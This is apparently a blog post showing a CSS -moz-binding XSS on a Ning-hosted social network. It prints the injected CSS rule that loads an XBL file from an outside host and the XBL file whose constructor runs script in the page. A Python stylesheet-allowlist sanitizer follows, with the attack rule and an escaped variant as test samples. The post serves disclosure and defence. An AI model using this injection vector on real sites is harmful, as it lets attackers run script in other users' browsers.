House Of Hacked Hackers.

Ah well, pun intended. :)

Looks like Ning.com is vulnerable to XSS, and quite a bit at that. I signed up on PDP's new social network, House of Hackers. It seems that Ning lets us edit the stylesheet; obviously they never heard of CSS XSS -moz-binding attacks, otherwise this would not work. These XSS attacks can be launched from a stylesheet.

http://houseofhackers.ning.com/profile/0x0000000

I just created a new CSS rule that fetches the XBL sheet that I borrowed from my good friend Gareth to include it on Ning as an example.

#xg_body {
    -moz-binding: url("http://0x000000.com/xbl.xml#xss");
}

Which modifies the page like so:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
          xmlns:html="http://www.w3.org/1999/xhtml">
  <binding id="xss">
    <implementation>
      <!-- The constructor runs as script in the page once the binding is attached. -->
      <constructor><![CDATA[
        document.getElementById('xg_sitename').innerHTML = '<h1>HOUSE OF H4x0rs!!!!!</h1>';
      ]]></constructor>
    </implementation>
  </binding>
</bindings>

There are probably more vectors possible, and hence my problem with such sites as a whole.
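
On the defensive side, a site that accepts member stylesheets can allowlist properties instead of trying to blocklist dangerous ones. The sketch below is an added example, not code from the original post or from Ning; the allowlist contents, function names and the placeholder URL are assumptions. It normalizes comments and backslash escapes before comparing names, so an escaped spelling of `-moz-binding` is caught as well.

```python
import re

# Assumption: a small allowlist of cosmetic properties; a real site would extend it.
ALLOWED = {"color", "background-color", "font-family", "font-size",
           "font-weight", "margin", "padding", "border", "text-align"}
# Value tokens that fetch or execute external content are refused outright.
FORBIDDEN_VALUE = re.compile(r"url\s*\(|expression\s*\(|javascript:", re.I)
ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\([^\r\n\f0-9a-fA-F])")
RULE = re.compile(r"([^{}]*)\{([^{}]*)\}")

def normalize(css):
    """Strip comments and decode backslash escapes before any name is compared."""
    css = re.sub(r"/\*.*?\*/", "", css.replace("\x00", ""), flags=re.S)
    def decode(m):
        if m.group(1):
            cp = int(m.group(1), 16)
            return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"
        return m.group(2)
    return ESCAPE.sub(decode, css)

def audit_stylesheet(css):
    """Return (selector, property, reason) for every declaration to reject."""
    text = normalize(css)
    findings = []
    if "@" in text:  # @import, @font-face, @media: not needed for simple theming
        findings.append(("", "@", "at-rules are not accepted"))
    for selector, body in RULE.findall(text):
        for decl in filter(None, (d.strip() for d in body.split(";"))):
            prop, _, value = decl.partition(":")
            prop = prop.strip().lower()
            if prop not in ALLOWED:
                findings.append((selector.strip(), prop, "property not allowlisted"))
            elif FORBIDDEN_VALUE.search(value):
                findings.append((selector.strip(), prop, "forbidden value token"))
    return findings

# Constructed samples: the rule from the post, an escaped spelling of the same
# property (placeholder URL), and a harmless theme rule.
PAGE_RULE = '#xg_body {\n-moz-binding:url("http://0x000000.com/xbl.xml#xss");\n}'
ESCAPED_RULE = r'#xg_body { -moz-bind\69 ng: url("https://example.invalid/x.xml#b") }'
BENIGN_RULE = "#xg_body { color: #333; font-size: 12px; }"

if __name__ == "__main__":
    for sample in (PAGE_RULE, ESCAPED_RULE, BENIGN_RULE):
        print(audit_stylesheet(sample))
```

A stylesheet is stored only when `audit_stylesheet` returns an empty list; anything else is rejected rather than repaired.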
